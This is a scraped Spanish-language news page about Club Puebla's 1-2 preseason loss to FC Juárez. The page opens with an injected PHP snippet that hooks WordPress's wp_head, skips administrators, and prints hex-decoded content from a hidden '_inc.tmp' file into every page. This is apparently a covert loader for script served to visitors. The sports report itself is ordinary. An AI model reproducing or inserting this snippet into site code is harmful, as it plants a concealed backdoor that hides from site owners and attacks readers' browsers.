if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } El Puebla inició con derrota sus partidos de preparación – La Opinión Universitaria La Opinión Universitaria
Menu

El Puebla inició con derrota sus partidos de preparación

*Cayó 1-2 con FC Juárez

En su primer juego de preparación rumbo al torneo Apertura 2019 de la Liga MX, el Club Puebla perdió 1-2 con FC Juárez.

El juego celebrado en la cancha del estadio Cuauhtémoc, estuvo dividido en 2 partes de 30 minutos y uno de 45.

El 1-0 fue anotado por Matías Alustiza en el minuto 15 del primer tiempo, luego de que el árbitro cobró una pena máxima por falta en el área.

En segundo tiempo el equipo visitante empató el marcador, a través de Flavio Santos.

Con alineaciones diferentes por parte de ambos equipos, se jugó el Tercer tiempo en el cual Leandro Carrijo anotó el segundo tanto para el FC Juárez, mismo que cerró el marcador.

El siguiente cotejo de los Franjiazules, será el miércoles 3 de julio ante Oaxaca, en la cancha del inmueble dos veces mundialista.